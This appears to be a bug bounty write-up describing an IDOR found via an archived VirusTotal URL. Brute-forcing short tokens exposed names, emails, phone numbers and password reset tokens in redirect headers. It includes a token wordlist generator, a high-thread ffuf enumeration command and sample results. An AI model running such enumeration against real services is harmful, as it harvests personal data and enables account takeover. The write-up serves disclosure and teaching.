Inspectiv | Unauthenticated Mass PII leak via IDOR

https://app.inspectiv.com (Redacted Program)

The Illusion of Security

In the interconnected world of modern applications, what appears dead often conceals living threats. This case study documents my discovery of a Insecure Direct Object Reference (IDOR) vulnerability in a <redacted> platform, where expired tokens showed harmless "404 Not Found" pages while dead and active tokens silently leaked user records (PII + Reset Tokens).

The VirusTotal Revelation

The Initial Clue During routine reconnaissance, a VirusTotal domain report revealed a cryptic entry:

https://virustotal.com/vtapi/v2/domain/report?apikey=<Virustotal_API_Key>&domain=target.com

"undetected_urls": [
  [
    "https://target.com/<provision>/qsNW",
    "<SHA-256>",
    0, 91, "2024-02-10 03:34:22"
  ]
]

Direct access to the endpoint showed a 302 found --> PII leak on Location Header --> follow redirect returns Firebase 404 page, which means this were once a valid token

Weaponizing Token Entropy:

Generate Token Wordlist with all possible 4-character tokens unique combinations (a-z, A-Z, 0-9):

import itertools
import string

def generate_wordlist(output_file):
    chars = string.ascii_letters + string.digits  # 62 characters (a-z, A-Z, 0-9)
    total = len(chars) ** 4  # 62^4 = 14,776,336 combinations
    buffer = []
    
    with open(output_file, 'w') as f:
        for combo in itertools.product(chars, repeat=4):
            buffer.append(''.join(combo) + '\n')
            
            if len(buffer) >= 100000:  
                f.writelines(buffer)
                buffer = []
                
        if buffer:
            f.writelines(buffer)
            
    return total

if __name__ == "__main__":
    output_filename = "4_char_wordlist.txt"
    print("Generating all 4-character combinations...")
    total_count = generate_wordlist(output_filename)
    print(f"Successfully generated {total_count:,} combinations")
    print(f"Saved to: {output_filename}")

python3 generate_wordlists.py  
4_char_wordlist.txt

cat 4_char_wordlist.txt | wc -l
14776336

FUZZ the 4-character token endpoint with our generated wordlists. https://github.com/ffuf/ffuf

ffuf -w 4_char_wordlist.txt -u "https://target.com/<provision>/FUZZ" -H "X-Inspectiv-Tester: Luxiel" -H "Host: target.com" -k -mc 302 -t 500 -p 0.1-0.3

(we add the Header "X-Inspectiv-Tester" for their tracking and audit purposes)

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://target.com/<provision>/FUZZ
 :: Wordlist         : FUZZ: /home/kali/bugbounty/target.com/4_char_wordlist.txt
 :: Header           : Host: target.com
 :: Header           : X-Inspectiv-Tester: Luxiel
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 500
 :: Delay            : 0.10 - 0.30 seconds
 :: Matcher          : Response status: 302
________________________________________________


[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 591ms]
| URL | https://target/<provision>/aaem
| -->; | https://target/<provision>?firstName={leak}+&lastName={leak}&phoneNumber={leak}&email={leak}@gmail.com&resetToken={leak}
    * FUZZ: aaem

[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 537ms]
| URL | https://target/<provision>/aa9M
| -->; | https://target.com/<provision>?firstName={leak}+&lastName={leak}&phoneNumber={leak}&email={leak}@gmail.com&resetToken={leak}
    * FUZZ: aa9M
.
.
.
.
and so on.. 
(Thousands of PII are being leaked on the Location header, despite this tokens already expired or used)

The Inspectiv security team provided me with a test account (which turned out to be for a private bug bounty program domain I stumbled into) to demonstrate a full account takeover via "Forgot password" functionality. I successfully executed this on the test account they gave me without affecting or violating other users.

Impact:

Mass PII Harvesting: 14.7M tokens can be enumerated in less than 10 hours ( Old 4-Character Token = PII leak persistence bug)
Account Takeover via unused reset tokens
Compliance and Privacy Violations

Reference:

Insecure direct object references (IDOR) | Web Security AcademyWebSecAcademy

Insecure Direct Object Reference Prevention - OWASP Cheat Sheet Seriescheatsheetseries.owasp.org

CWE 639: Insecure Direct Object ReferenceVeracode

Conclusion:

Security through obscurity fails when tokens follow predictable lifecycles

For developers:

Design tokens with high entropy, short-lived, and access-controlled.
Implement Rate-limiting
Treat production tokens like nuclear codes especially for unused tokens- never expose them to third-party scanners (eg. Virus total). What VirusTotal archives, attackers will find."

For bug hunters:

When you find tokens in VT archives, recognize they represent security process failures beyond technical flaws. Analyze the archived endpoints via burpsuite or Chrome devtools.

and remember:

always seek permission before conducting any potentially disruptive tests such as overloading them with massive requests. Actions like these are generally violates the company code and conduct.

(Hard earned lesson for me).

https://x.com/0xLuX1eL/status/1940666065719382102

Update:

I've developed an automation tool that streamlines the process of enumerating VirusTotal domain reports, extracting URLs, and recursively discovering subdomains. This tool is designed to save significant time during reconnaissance workflows.

Check it out here: https://github.com/0xLuxieL/VT-Recon

Thats it for for this section and thanks for reading! 👋

PreviousTremendous | Vulnerability Disclosure Program NextInspectiv | Chained Credential Leak & API Privilege Escalation

Last updated 1 month ago

hashtagConclusion:

Conclusion: